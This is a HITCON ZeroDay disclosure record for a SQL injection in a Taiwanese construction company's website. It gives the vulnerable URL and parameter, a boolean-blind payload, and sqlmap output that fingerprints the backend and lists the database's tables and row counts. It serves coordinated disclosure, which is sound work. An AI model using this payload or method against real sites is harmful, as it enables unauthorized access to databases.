Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00426
- Vendor: 力麒建設股份有限公司
- Title: 力麟建设SQL
- Introduction: 力麟建设SQL
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2018/04/07 22:09:26 : 新提交 (由 Cra5h 更新此狀態)
- 2018/04/08 00:11:56 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/08 02:27:31 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/08 02:27:32 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/12 16:36:43 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/12 16:36:44 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/05/30 13:34:09 : 複測申請中 (由 組織帳號 更新此狀態)
- 2018/06/17 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-00426
- 通報者:cra5h (Cra5h)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
力麟建设SQL
SQL位置:
http://www.rhd.com.tw/pageview.asp?pageno=9
pageno参数过滤不严导致SQL产生
GET parameter 'pageno' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
Parameter: pageno (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageno=9 AND 3722=3722
[21:28:41] [INFO] testing MySQL
[21:28:41] [WARNING] the back-end DBMS is not MySQL
[21:28:41] [INFO] testing Oracle
[21:28:42] [WARNING] the back-end DBMS is not Oracle
[21:28:42] [INFO] testing PostgreSQL
[21:28:42] [WARNING] the back-end DBMS is not PostgreSQL
[21:28:42] [INFO] testing Microsoft SQL Server
[21:28:42] [WARNING] the back-end DBMS is not Microsoft SQL Server
[21:28:42] [INFO] testing SQLite
[21:28:42] [WARNING] the back-end DBMS is not SQLite
[21:28:42] [INFO] testing Microsoft Access
[21:28:42] [INFO] confirming Microsoft Access
[21:28:43] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
[21:28:43] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 64 times
[21:28:43] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.rhd.com.tw'
确认影响库:(2库)
Database: Microsoft_Access_masterdb
[2 tables]
+----------+
| question |
| sales |
+----------+
[21:33:21] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3148 times
[21:33:21] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.rhd.com.tw
查看数据量:
Database: Microsoft_Access_masterdb
+----------+---------+
| Table | Entries |
+----------+---------+
| question | 74 |
| sales | 20 |
+----------+---------+
[21:38:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 17 times
[21:38:03] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.rhd.com.tw'
修補建議
过滤,参数化